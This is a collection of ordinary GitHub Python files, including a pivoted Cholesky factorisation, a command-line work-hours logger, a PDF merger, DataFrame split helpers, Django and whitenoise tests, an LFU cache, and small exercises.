+{"seq_id":"6614999616","text":"import numpy as np\n\n\ndef ldl_factorP(A):\n\n ## Pt * L * Lt * P = A\n ## L * Lt = P * A * Pt\n counter = 0\n dD = np.diag(np.sqrt(np.diag(A)))\n iD = np.diag(1.0 / np.sqrt(np.diag(A)))\n L,p, counter = __ldl_factorP__(iD.dot(A.dot(iD)),counter)\n\n P = np.eye(A.shape[0])\n P = P[p,:]\n dD = P.dot(dD.dot(P.T))\n L = dD.dot(L)\n return L, P, counter\n\n\ndef __ldl_factorP__(A,counter):\n\n nullPivotTolerance = 1e-14\n n = A.shape[0]\n\n\n perm = np.arange(n)\n L = np.zeros(A.shape)\n dA = np.diag(A)\n p = np.argmax(dA)\n perm[-1] = p\n perm[p] = n-1\n Ac = A[np.ix_(perm,perm)]\n\n if Ac[0,0] < 0 or np.abs(Ac[0,0]) < nullPivotTolerance:\n return L, perm, counter\n\n\n #print(\"Ac = \", Ac[0,0])\n l11 = np.sqrt(Ac[0,0])\n L[0,0] = l11\n\n if n > 1:\n l1 = Ac[1:,0] / l11\n A_ = Ac[1:,1:] - np.outer(l1,l1) \n L[1:,1:], pout, counter = __ldl_factorP__(A_,counter)\n perm[1:] = perm[1:][pout] \n L[1:,0] = l1[pout]\n\n counter += 1\n\n return L, perm, counter\n\nif __name__ == '__main__':\n\n A = np.array([\n [ 4.06462389e+02, 9.65043990e+02, -1.51768915e+01, 1.41151993e+02],\n [ 9.65043990e+02, 1.99313978e+04, 1.41151993e+02, 1.16119375e+04],\n [-1.51768915e+01, 1.41151993e+02, 4.06462389e+02, 9.65043990e+02],\n [ 1.41151993e+02, 1.16119375e+04, 9.65043990e+02, 1.99313978e+04]])\n\n# n = 5\n# A =np.random.rand(n,n)\n# U, s, V = np.linalg.svd(A)\n# s[-3:]=0\n# A = U.dot(np.diag(s).dot(U.T))\n L, P, rank = ldl_factorP(A)\n LLt_A = L.dot(L.T) - P.dot(A.dot(P.T))\n del0 =np.linalg.norm(LLt_A)\n print(\"L*Lt - A(p,p) = \", del0)\n print(\"rank = \", rank)\n","repo_name":"mar440/hdd","sub_path":"python-helpers/singularCholesky.py","file_name":"singularCholesky.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39862622206","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport glob\nimport re\nimport datetime\nimport pickle\nimport subprocess\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef quarter_ceil(x): #{{{\n \"\"\" round up to nearest quarter \"\"\"\n return np.ceil(x*4)/4. #}}}\n\ndef custom_round(x):\n #return quarter_ceil(x)\n return np.round(x,1)\n\ndef last_week_summary(df, numdays=7, alldetail=True): #{{{\n today = datetime.datetime.now()\n start = today - datetime.timedelta(days=numdays)\n dfs = df.loc[start.strftime('%Y-%m-%d'):today.strftime('%Y-%m-%d')]\n for projtype in np.unique(dfs.proj.values):\n print_proj_type(dfs, projtype, workdetail=False)\n if alldetail:\n for spectask in np.unique(dfs[dfs['proj'].isin([projtype])].task.values):\n print_proj_type(dfs, projtype, spectask=spectask, workdetail=True)\n print('****************************************************************************************')\n return #}}}\n\ndef print_proj_type(df, projtype='ACMEanalysis', spectask=None, workdetail=True): #{{{\n\n if spectask is not None:\n fmtstr = 'Computing detailed summary for %s: %s'\n else:\n fmtstr = '\\nTotal summary for %s: %s'\n if spectask is not None:\n print(' ')\n print(fmtstr%(projtype, ' ' if spectask is None else spectask))\n if spectask is not None:\n print('---------------------------------------------')\n\n acmework = df[df['proj'].isin([projtype])]\n if spectask is not None:\n acmework = acmework[acmework['task'].isin([spectask])]\n acmework = acmework.resample('W')\\\n .agg(hrs=('hrs', sum), \n proj=('proj',lambda x: '; '.join(x.values)),\n task=('task',lambda x: '; '.join(x.values)),\n log=('log',lambda x: '; '.join(x.values)))\n for day, hrs, log in zip(acmework.index, acmework.hrs, acmework.log):\n if not np.isnan(hrs):\n printhrs = \"(%0.1f hrs)\"%(custom_round(hrs))\n if not workdetail:\n log = ''\n print('Week of', day.date(), ' %s:'%(printhrs), log)\n \n acmework = df[df['proj'].isin([projtype])].resample('D')\\\n .agg(hrs=('hrs',sum), \n proj=('proj',lambda x: '; '.join(x.values)),\n task=('task',lambda x: '; '.join(x.values)),\n log=('log',lambda x: '; '.join(x.values)))\n for day, hrs, log in zip(acmework.index, acmework.hrs, acmework.log):\n if not np.isnan(hrs):\n printhrs = \"(%0.1f hrs)\"%(custom_round(hrs))\n if not workdetail:\n log = ''\n print('Day of', day.date(), ' %s:'%(printhrs), log)\n\n if spectask is None:\n print('****************************************************************************************')\n return #}}}\n\ndef plot_avg_hrs(df): #{{{\n fig, ax = plt.subplots(1, 1)\n (df.resample(\"1d\").sum('hrs').rolling(window=14, min_periods=1).sum()/2).plot(label='daily', ax=ax);\n (df.resample(\"1W\").sum('hrs').asfreq('d', method='backfill')).plot(label='weekly', ax=ax)\n plt.ylabel('hrs / week')\n L = plt.legend(loc='best')\n L.get_texts()[0].set_text('daily')\n L.get_texts()[1].set_text('weekly')\n plt.grid(True)\n return #}}}\n\ndef print_general_summary(df): #{{{\n now = datetime.datetime.now()\n twoweeksago = now - datetime.timedelta(13)\n end = '%02d-%02d-%02d'%(now.year, now.month, now.day)\n start = '%02d-%02d-%02d'%(twoweeksago.year, twoweeksago.month, twoweeksago.day)\n biweeklywork = df[start:end].groupby(pd.Grouper(freq='D')).sum('hrs')\n\n print('-------------------------------')\n print(' Daily hours ')\n print('-------------------------------')\n for day, hrs in zip(biweeklywork.index, biweeklywork.hrs):\n if not np.isnan(hrs):\n 
print('| Day ', day.date(), '|', \" %5.1f hrs |\"%(hrs))\n print('-------------------------------')\n print('Sum: %.2f hrs/week'%(biweeklywork.sum().hrs/2.0))\n\n print('\\n')\n\n #print week totals\n print('-----------------------------')\n print(' Week ending totals ')\n print('-----------------------------')\n weeks = df.resample('W').sum('hrs').tail()\n for day, hrs in zip(weeks.index, weeks.hrs):\n print('| ', day.date(), ' | ', \"%6.1f hrs |\"%(hrs))\n print('-----------------------------')\n return #}}}\n\ndef savefig(name): #{{{\n print('Saving figure to %s'%(name))\n plt.savefig(name) #}}}\n\ndef build_log(database): #{{{\n # get files organized in terms of year/month/day/daily.log\n logfiles = glob.glob(database + '/*/*/*/daily.log')\n\n tottimestamp = None\n totduration = []\n totproj = []\n tottask = []\n totlog = []\n totvalid = []\n for logfile in logfiles:\n # process raw data\n time = np.asarray([re.findall(r'..-..-.. ..:..:..', line)[0] for line in open(logfile)])\n\n def get_lines(string):\n item = [re.findall(string, line) for line in open(logfile)] \n return np.asarray([ai if ai != [] else [''] for ai in item])\n\n proj = get_lines(r'PROJ={.*?}')\n task = get_lines(r'TASK={.*?}')\n log = get_lines(r'LOG={.*?}')\n valid = [(ap != [''])[0] for ap in proj]\n\n time = pd.to_datetime(time, format='%y-%m-%d %H:%M:%S')\n\n tottimestamp = np.concatenate((tottimestamp, time)) if tottimestamp is not None else time\n totproj += proj.tolist()[:]\n tottask += task.tolist()[:]\n totlog += log.tolist()[:]\n totvalid += valid[:]\n\n hours = np.asarray([0] + [atime/np.timedelta64(1, 'h') for atime in np.diff(tottimestamp)])\n #plt.plot(tottimestamp,hours,'.'); plt.show()\n #assert hours[-1] < 3./60., 'Ending time is very large= ' + hours[-1]\n #assert proj[0] == [] and proj[-1] == [], \"Don't necessarily have good data for \" + logfile\n #assert task[0] == [] and task[-1] == [], \"Don't necessarily have good data for \" + logfile\n totvalid = np.where(totvalid)\n totproj = [item[0][6:-1] for item in np.asarray(totproj)[totvalid].tolist()]\n tottask = [item[0][6:-1] for item in np.asarray(tottask)[totvalid].tolist()]\n totlog = [item[0][5:-1] for item in np.asarray(totlog)[totvalid].tolist()]\n totduration = np.asarray(hours)[totvalid]\n totstarttime = pd.to_datetime(np.asarray(tottimestamp)[totvalid])\n totendtime = totstarttime + pd.to_timedelta(totduration, unit='h')\n\n # build dataframe\n df = pd.DataFrame({ #'start' : totstarttime,\n 'end' : totendtime,\n 'hrs' : totduration,\n 'proj' : totproj,\n 'task' : tottask,\n 'log' : totlog\n }, index=pd.Series(totstarttime))\n last_week_summary(df, alldetail=False)\n last_week_summary(df)\n # print summary\n #print_proj_type(df, projtype='ACMEanalysis')\n #print_proj_type(df, projtype='ACME')\n #print_proj_type(df, projtype='coastal')\n #print_proj_type(df, projtype='ziso')\n #print_proj_type(df, projtype='sciviz')\n print_general_summary(df)\n\n # plot of average hours:\n plot_avg_hrs(df)\n\n #plt.plot(tottimestamp,totduration,'.'); plt.show()\n\n savefig('/Users/pwolfram/hist.png')\n\n return #}}}\n\ndef folder_exists(folder, create=True, verbose=True): #{{{\n if not os.path.exists(folder):\n if create:\n print('Creating folder at ', folder)\n os.makedirs(folder)\n return False\n else:\n return True\n #}}}\n\ndef load_stored_sets(setlocation): #{{{\n if os.path.isfile(setlocation):\n with open(setlocation, 'rb') as af:\n setvalues = pickle.load(af)\n else:\n setvalues = set()\n return setvalues #}}}\n\ndef save_stored_sets(aset, 
setlocation): #{{{\n print('saving %s at %s'%(aset, setlocation))\n with open(setlocation, 'wb') as af:\n pickle.dump(aset, af)\n return #}}}\n\ndef sanitize_response(response): #{{{\n # separate comma separated items\n values = response.split(',')\n # remove spaces in front or back of string\n values = [av.rstrip() for av in values]\n values = [av.lstrip() for av in values]\n return values #}}}\n\ndef make_log_entry(logfile, timestamp, projname, taskname, entry): #{{{\n with open(logfile, 'a') as lf:\n if entry == 'START' or entry == 'END':\n log = entry + '\\n'\n else:\n log = 'PROJ={' + projname + '}, TASK={' + taskname + '}, LOG={' + entry + '}\\n'\n line = timestamp + '\\t '+ log\n lf.write(line)\n print('wrote:\\n %s to\\n%s'%(line, logfile))\n return #}}}\n\ndef undo_log_entry(logfile, timestamp): #{{{\n # remove last line\n with open(logfile, 'r+') as lf:\n lines = lf.readlines()\n lastline = lines[-1]\n lf.seek(0)\n for li in lines[:-1]:\n lf.write(li)\n lf.truncate()\n\n undofile = logfile + '.undo'\n with open(undofile, 'a') as lf:\n undoline = 'Undo at %s:'%(timestamp) + lastline\n lf.write(undoline)\n print('wrote:\\n %s to\\n%s'%(undoline, undofile))\n return #}}}\n\n\ndef file_locations(database): #{{{\n now = datetime.datetime.now()\n yearfolder = database + '/' + \"%.4d\"%(now.year)\n monthfolder = yearfolder + '/' + \"%.2d\"%(now.month)\n dayfolder = monthfolder + '/' + \"%.2d\"%(now.day)\n logfile = dayfolder + '/' + 'daily.log'\n timestamp = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # make sure file locations are available\n for afold in [database, yearfolder, monthfolder, dayfolder]:\n folder_exists(afold)\n\n return logfile, timestamp #}}}\n\ndef print_items(prompt, items, nitems=3): #{{{\n # break items up into sets of 5\n print(\"================================================================================\")\n print(prompt)\n print(\"--------------------------------------------------------------------------------\")\n thelist = list(items)\n n = len(thelist)\n for i in np.arange(int(np.ceil(n/float(nitems)))):\n print(thelist[nitems*i:(nitems*i+nitems)])\n print(\"================================================================================\")\n return #}}}\n\ndef log_work(database, start, end, undo): #{{{\n\n logfile, timestamp = file_locations(database)\n\n projectfile = database + '/projects.p'\n projects = load_stored_sets(projectfile)\n\n taskfile = database + '/tasks.p'\n tasks = load_stored_sets(taskfile)\n\n if undo:\n undo_log_entry(logfile, timestamp)\n elif start:\n make_log_entry(logfile, timestamp, '', '', 'START')\n elif end:\n make_log_entry(logfile, timestamp, '', '', 'END')\n # print summary at closeout\n build_log(database)\n else:\n print_items('Projects', sorted(projects))\n response = input(\"Please enter project names, e.g., 'proj1, proj2, etc':\\n\")\n projname = sanitize_response(response)\n projects = projects | set(projname)\n\n print_items('Tasks', sorted(tasks))\n response = input(\"Please enter task names, e.g., 'analysis, lit_review, misc':\\n\")\n taskname = sanitize_response(response)\n tasks = tasks | set(taskname)\n\n entry = input(\"Please log entry:\\n\")\n # refresh time stamp to follow once entry is committed\n logfile, timestamp = file_locations(database)\n make_log_entry(logfile, timestamp, ','.join(projname), ','.join(taskname), entry)\n\n save_stored_sets(projects, projectfile)\n save_stored_sets(tasks, taskfile)\n return #}}}\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n\n parser = 
OptionParser()\n parser.add_option(\"-d\", \"--database_location\", dest=\"database\", help=\"Location for work database\", metavar=\"FOLDER\")\n parser.add_option(\"-s\", \"--start\", dest=\"start\", help=\"Starting entry\", action='store_true')\n parser.add_option(\"-e\", \"--end\", dest=\"end\", help=\"Ending entry\", action='store_true')\n parser.add_option(\"-l\", \"--log\", dest=\"log\", help=\"Make analyzable log\", action='store_true')\n parser.add_option(\"-u\", \"--undo\", dest=\"undo\", help=\"Undo last entry\", action='store_true')\n parser.add_option(\"-p\", \"--print\", dest=\"printlog\", help=\"Print daily work log\", action='store_true')\n parser.add_option(\"-r\", \"--edit\", dest=\"editlog\", help=\"Edit daily work log\", action='store_true')\n parser.add_option(\"-x\", \"--editsource\", dest=\"editsource\", help=\"Edit source script\", action='store_true')\n parser.set_defaults(start=False, end=False, undo=False, printlog=False)\n\n\n options, args = parser.parse_args()\n if not options.database:\n options.database = os.path.expanduser('~') + '/Documents/WorkLogDatabase'\n\n source = sys.argv[0]\n print(\"Using database at \" + options.database + \" with script at \" + source)\n\n if options.printlog:\n logfile, timestamp = file_locations(options.database)\n print(\"================================================================================\")\n print('Current time is %s'%(timestamp))\n print('Outputing daily log %s:'%(logfile))\n print(\"--------------------------------------------------------------------------------\")\n with open(logfile,'r') as lf:\n print(lf.read())\n lf.close()\n print(\"--------------------------------------------------------------------------------\")\n print(logfile)\n elif options.editlog:\n logfile, timestamp = file_locations(options.database)\n edit_call = [ \"mvim\", logfile]\n edit = subprocess.Popen(edit_call)\n elif options.editsource:\n edit_call = [\"mvim\", source]\n edit = subprocess.Popen(edit_call)\n elif options.log:\n # build the log database\n build_log(options.database)\n else:\n log_work(options.database, options.start, options.end, options.undo)\n","repo_name":"pwolfram/scrIpT","sub_path":"work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":14155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29116916864","text":"from dados import produtos, pessoas, qualquercoisa\n# forma usando a função map()\n# nov_list = map(lambda x:x * 2, qualquercoisa) #multiplicando os valores da nova lista\n# print(nov_list)\n# print(list(nov_list))\n#\n# print('forma usando o list comprehesion')\n# lista_compreendida = [x * 2 for x in qualquercoisa]\n# print(lista_compreendida)\n\ndef aumenta_preco(p):\n p['preco'] = round(p['preco'] * 1.05, 2)\n return p\n\nprecos = map(lambda p: p['preco'], produtos) #acessando a coluna de preco\n\nnovo_preco = map(aumenta_preco, produtos)\n\nprint(list(novo_preco))\nprint('usando a lista de nomes, alterando as idades \\n')\n\n#nomes = map(lambda p:p['nome'], pessoas) #pegando os nomes das pessoas\ndef aumenta_idade(p):\n p['nova_idade'] = round(p['idade'] * 1.20)\n return p\n\nnomes = map(aumenta_idade, pessoas)\n\nfor n in nomes:\n print(n)","repo_name":"AdrianaViabL/Curso-Python-udemy","sub_path":"2 - python intermediario/73 - map/mapeamento.py","file_name":"mapeamento.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24620982611","text":"from PyPDF2 import PdfFileMerger, PdfFileReader\n\nimport os\n# os.getcwd() : 다른 폴더에서 추출하기 위한 용도\n\ndef pdf_merger(file):\n merger = PdfFileMerger()\n for items in os.listdir():\n if items.endswith('.pdf'):\n merger.append(items)\n merger.write(\"Final_pdf.pdf\")\n merger = PdfFileMerger()\n with open(file, 'rb') as f:\n merger.append(PdfFileReader(f))\n merger.close()\n \nif __name__=='__main__':\n file = input(\"현재 폴더에 있는 pdf 파일들을 합칠 원본 pdf 파일을 입려하세요 : \")\n pdf_merger(file)\n","repo_name":"sean-baek/toy_project","sub_path":"py/merge_multiple_pdf.py","file_name":"merge_multiple_pdf.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30308705227","text":"\"\"\"\nUtility functions for working with DataFrames.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\n\ndef train_validate_test_split(X, y, train_percent=60, validate_percent=20, seed=None):\n \"\"\"\n function to split X DataFrame/array and y vector into train, test and validate components\n :param X: array or DataFrame\n :param y: vector\n :param train_percent: (optional) train df percentage\n :param validate_percent: (optional) train df percentage\n :param seed: (optional) seed to maintain consistent results\n :return: Either: three dataframes/arrays and three vectors -\n X_train, X_test, X_val, y_train, y_test, y_val\n Or: tuple with: (-1, \"Error message\", None, None, None, None)\n\n to invoke, use code similar ot this:\n X_train, X_test, X_val, y_train, y_test, y_val = train_validate_test_split(X,\n y,\n train_percent=70,\n validate_percent=15,\n seed=321)\n Error checking should be done similar to ths:\n if not isinstance(X_train, pd.DataFrame):\n if X_train == -1:\n print(\"train_validate_test_split call failed - cause:\", X_test)\n \"\"\"\n\n if not (isinstance(train_percent, int) or isinstance(train_percent, float)):\n return -1, \"Non-numeric Train Set Percentage passed = \" + train_percent,\\\n None, None, None, None\n\n if not (isinstance(validate_percent, int) or isinstance(validate_percent, float)):\n return -1, \"Non-numeric Validation Set Percentage passed = \" + validate_percent,\\\n None, None, None, None\n\n if (train_percent + validate_percent) > 100:\n return -1, \"Input Percentages > 100\", None, None, None, None\n\n if seed is None:\n pass\n elif not (isinstance(seed, int)):\n return -1, \"Non-integer seed passed = \" + seed, None, None, None, None\n else:\n np.random.seed(seed)\n\n test_size = (100 - (train_percent + validate_percent))/100\n \n val_size = validate_percent / (train_percent + validate_percent)\n\n temp_x, X_test, temp_y, y_test = train_test_split(X, y, test_size=test_size)\n\n X_train, X_val, y_train, y_val = train_test_split(temp_x, temp_y, test_size=val_size)\n\n return X_train, X_test, X_val, y_train, y_test, y_val\n\nstates = {\n \"AL\": \"Alabama\",\n \"AK\": \"Alaska\",\n \"AZ\": \"Arizona\",\n \"AR\": \"Arkansas\",\n \"CA\": \"California\",\n \"CO\": \"Colorado\",\n \"CT\": \"Connecticut\",\n \"DC\": \"District of Columbia\",\n \"DE\": \"Delaware\",\n \"FL\": \"Florida\",\n \"GA\": \"Georgia\",\n \"HI\": \"Hawaii\",\n \"ID\": \"Idaho\",\n \"IL\": \"Illinois\",\n \"IN\": \"Indiana\",\n \"IA\": \"Iowa\",\n \"KS\": \"Kansas\",\n \"KY\": \"Kentucky\",\n \"LA\": \"Louisiana\",\n \"ME\": \"Maine\",\n \"MD\": \"Maryland\",\n \"MA\": \"Massachusetts\",\n \"MI\": \"Michigan\",\n \"MN\": \"Minnesota\",\n \"MS\": \"Mississippi\",\n \"MO\": \"Missouri\",\n \"MT\": \"Montana\",\n \"NE\": \"Nebraska\",\n \"NV\": \"Nevada\",\n \"NH\": \"New Hampshire\",\n \"NJ\": \"New Jersey\",\n \"NM\": \"New Mexico\",\n \"NY\": \"New York\",\n \"NC\": \"North Carolina\",\n \"ND\": \"North Dakota\",\n \"OH\": \"Ohio\",\n \"OK\": \"Oklahoma\",\n \"OR\": \"Oregon\",\n \"PA\": \"Pennsylvania\",\n \"PR\": \"Puerto Rico\",\n \"RI\": \"Rhode Island\",\n \"SC\": \"South Carolina\",\n \"SD\": \"South Dakota\",\n \"TN\": \"Tennessee\",\n \"TX\": \"Texas\",\n \"UT\": \"Utah\",\n \"VT\": \"Vermont\",\n \"VA\": \"Virginia\",\n \"WA\": \"Washington\",\n \"WV\": \"West Virginia\",\n \"WI\": \"Wisconsin\",\n \"WY\": \"Wyoming\"}\n\ndef get_state_abbrev(state):\n \"\"\"\n function to return 
state abbreviation given state name\n :param abbrev: variable-character string with state name\n :return: 2-character string with state abbreviation\n \"\"\"\n return [k for k,v in states.items() if v == state][0]\n\ndef get_state_name(abbrev):\n \"\"\"\n function to return state name given abbreviation\n :param abbrev: 2-character string with state abbreviation\n :return: variable-character string with state name\n \"\"\"\n return states[abbrev]\n","repo_name":"wel51x/lambdata","sub_path":"lambdata_wel51x/df_utils.py","file_name":"df_utils.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4803072104","text":"from django.test import TestCase\nfrom qa.models import Question, QuestionComment\nfrom qa import application\n\n\nclass ApplicationQuestionTests(TestCase):\n\n def setUp(self):\n from qa.models import Question, User\n user = User.objects.create()\n self.user = user\n\n def test_ask(self):\n question = Question(title='Q_ask', author=self.user)\n application.question.ask(question)\n\n question_test = Question.objects.get(title='Q_ask')\n\n self.assertIsNotNone(question_test)\n\n def test_vote_up(self):\n votes_to_up = 1\n question = Question.objects.create(title='Q_vote_up',\n up_votes=votes_to_up,\n author=self.user)\n application.question.vote_up(question)\n\n question_test = Question.objects.get(title='Q_vote_up')\n self.assertEqual(question_test.up_votes,\n votes_to_up + 1)\n\n def test_vote_down(self):\n votes_to_down = 1\n question = Question.objects.create(title='Q_vote_down',\n down_votes=votes_to_down,\n author=self.user)\n application.question.vote_down(question)\n\n question_test = Question.objects.get(title='Q_vote_down')\n self.assertEqual(question_test.down_votes,\n votes_to_down + 1)\n\n def test_comment(self):\n question = Question.objects.create(title='Q_comment',\n author=self.user)\n comment = QuestionComment.objects.create(body='comment',\n author=self.user,\n question=question)\n\n #application.question.comment(question, comment)\n\n question_test = Question.objects.get(title='Q_comment')\n\n print(question_test.comments.get())\n\n comment = QuestionComment.objects.create(body='comment',\n author=self.user,\n question=question)\n\n self.assertEqual(comment, question_test.comments.get())\n","repo_name":"gcca/niebla","sub_path":"niebla/qa/tests/test_application_question.py","file_name":"test_application_question.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15085675176","text":"from __future__ import annotations\n\nimport os\nimport re\nimport shutil\nimport tempfile\nfrom posixpath import basename\n\nimport django\nimport pytest\nfrom django.conf import settings\nfrom django.contrib.staticfiles.storage import HashedFilesMixin\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.core.management import call_command\nfrom django.test.utils import override_settings\nfrom django.utils.functional import empty\n\nfrom tests.utils import Files\nfrom whitenoise.storage import CompressedManifestStaticFilesStorage\nfrom whitenoise.storage import MissingFileError\n\n\n@pytest.fixture()\ndef setup():\n staticfiles_storage._wrapped = empty\n files = Files(\"static\")\n tmp = tempfile.mkdtemp()\n with override_settings(\n STATICFILES_DIRS=[files.directory],\n STATIC_ROOT=tmp,\n ):\n yield settings\n staticfiles_storage._wrapped = empty\n shutil.rmtree(tmp)\n\n\n@pytest.fixture()\ndef _compressed_storage(setup):\n backend = \"whitenoise.storage.CompressedStaticFilesStorage\"\n if django.VERSION >= (4, 2):\n storages = {\n \"STORAGES\": {\n **settings.STORAGES,\n \"staticfiles\": {\"BACKEND\": backend},\n }\n }\n else:\n storages = {\"STATICFILES_STORAGE\": backend}\n\n with override_settings(**storages):\n yield\n\n\n@pytest.fixture()\ndef _compressed_manifest_storage(setup):\n backend = \"whitenoise.storage.CompressedManifestStaticFilesStorage\"\n if django.VERSION >= (4, 2):\n storages = {\n \"STORAGES\": {\n **settings.STORAGES,\n \"staticfiles\": {\"BACKEND\": backend},\n }\n }\n else:\n storages = {\"STATICFILES_STORAGE\": backend}\n\n with override_settings(**storages, WHITENOISE_KEEP_ONLY_HASHED_FILES=True):\n call_command(\"collectstatic\", verbosity=0, interactive=False)\n\n\ndef test_compressed_static_files_storage(_compressed_storage):\n call_command(\"collectstatic\", verbosity=0, interactive=False)\n\n for name in [\"styles.css.gz\", \"styles.css.br\"]:\n path = os.path.join(settings.STATIC_ROOT, name)\n assert os.path.exists(path)\n\n\ndef test_compressed_static_files_storage_dry_run(_compressed_storage):\n call_command(\"collectstatic\", \"--dry-run\", verbosity=0, interactive=False)\n\n for name in [\"styles.css.gz\", \"styles.css.br\"]:\n path = os.path.join(settings.STATIC_ROOT, name)\n assert not os.path.exists(path)\n\n\ndef test_make_helpful_exception(_compressed_manifest_storage):\n class TriggerException(HashedFilesMixin):\n def exists(self, path):\n return False\n\n exception = None\n try:\n TriggerException().hashed_name(\"/missing/file.png\")\n except ValueError as e:\n exception = e\n helpful_exception = CompressedManifestStaticFilesStorage().make_helpful_exception(\n exception, \"styles/app.css\"\n )\n assert isinstance(helpful_exception, MissingFileError)\n\n\ndef test_unversioned_files_are_deleted(_compressed_manifest_storage):\n name = \"styles.css\"\n versioned_url = staticfiles_storage.url(name)\n versioned_name = basename(versioned_url)\n name_pattern = re.compile(\"^\" + name.replace(\".\", r\"\\.([0-9a-f]+\\.)?\") + \"$\")\n remaining_files = [\n f for f in os.listdir(settings.STATIC_ROOT) if name_pattern.match(f)\n ]\n assert [versioned_name] == remaining_files\n\n\ndef test_manifest_file_is_left_in_place(_compressed_manifest_storage):\n manifest_file = os.path.join(settings.STATIC_ROOT, \"staticfiles.json\")\n assert os.path.exists(manifest_file)\n\n\ndef test_manifest_strict_attribute_is_set():\n with override_settings(WHITENOISE_MANIFEST_STRICT=True):\n storage = 
CompressedManifestStaticFilesStorage()\n assert storage.manifest_strict is True\n with override_settings(WHITENOISE_MANIFEST_STRICT=False):\n storage = CompressedManifestStaticFilesStorage()\n assert storage.manifest_strict is False\n","repo_name":"evansd/whitenoise","sub_path":"tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":2332,"dataset":"github-code","pt":"69"}
+{"seq_id":"25458406507","text":"#!/usr/bin/python3\n\"\"\"Least Frequently Used caching module.\n\"\"\"\n\nfrom base_caching import BaseCaching\n\n\nclass LFUCache(BaseCaching):\n \"\"\"Represents an object that allows storing and\n retrieving items from a dictionary with a LFU\n removal mechanism when the limit is reached.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initializes the cache instance.\n \"\"\"\n super().__init__()\n self.keys = []\n self.uses = {}\n\n def put(self, key, item):\n \"\"\"Adds an item in the cache.\n \"\"\"\n if key is not None and item is not None:\n if (len(self.keys) == BaseCaching.MAX_ITEMS and\n key not in self.keys):\n discard = self.keys.pop(self.keys.index(self.findLFU()))\n del self.cache_data[discard]\n del self.uses[discard]\n print('DISCARD: {:s}'.format(discard))\n self.cache_data[key] = item\n if key not in self.keys:\n self.keys.append(key)\n self.uses[key] = 0\n else:\n self.keys.append(self.keys.pop(self.keys.index(key)))\n self.uses[key] += 1\n\n def get(self, key):\n ''' Return value stored in `key` key of cache.\n If key is None or does not exist in cache, return None. '''\n if key is not None and key in self.cache_data:\n self.keys.append(self.keys.pop(self.keys.index(key)))\n self.uses[key] += 1\n return self.cache_data[key]\n return None\n\n def findLFU(self):\n ''' Return key of least frequently used item in cache.\n If multiple items have the same amount of uses, return the least\n recently used one. '''\n items = list(self.uses.items())\n freqs = [item[1] for item in items]\n least = min(freqs)\n\n lfus = [item[0] for item in items if item[1] == least]\n for key in self.keys:\n if key in lfus:\n return key\n","repo_name":"M1urray/alx-backend","sub_path":"0x01-caching/100-lfu_cache.py","file_name":"100-lfu_cache.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36710743826","text":"#\n# @lc app=leetcode id=326 lang=python3\n#\n# [326] Power of Three\n#\n\n# @lc code=start\nclass Solution:\n def isPowerOfThree(self, n: int) -> bool:\n result = 1\n while result <= n:\n if result == n:\n return True\n result *= 3\n \n return False\n# @lc code=end\n\n","repo_name":"kjonsson/leetcode","sub_path":"326.power-of-three.py","file_name":"326.power-of-three.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22043707132","text":"class Account:\n def __init__(self, owner, balance=0):\n self.owner = owner\n self.balance = balance\n\n def __str__(self):\n return f'Account owner: {self.owner}\\nAccount balance: ${self.balance}'\n\n def deposit(self, deposit_amt):\n self.balance += deposit_amt\n print('Deposit Accepted')\n\n def withdraw(self, wd_amount):\n if self.balance >= wd_amount:\n self.balance -= wd_amount\n print('Withdrawal Accepted')\n else:\n print('Sorry, Funds Unavailable!')\n\n# 1. Instantiate the class\nacct1 = Account('Celine',100)\nprint(acct1)\n\n# 3. Show the account owner attribute\nprint(acct1.owner)\n\n# 5. Make a series of deposits and withdrawals\nacct1.deposit(50)\n\nacct1.withdraw(75)\n\n# 6. Make a withdrawal that exceeds the available balance\nacct1.withdraw(500)\n\nprint(acct1.balance)\n","repo_name":"Surai98/class_bankaccount","sub_path":"challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
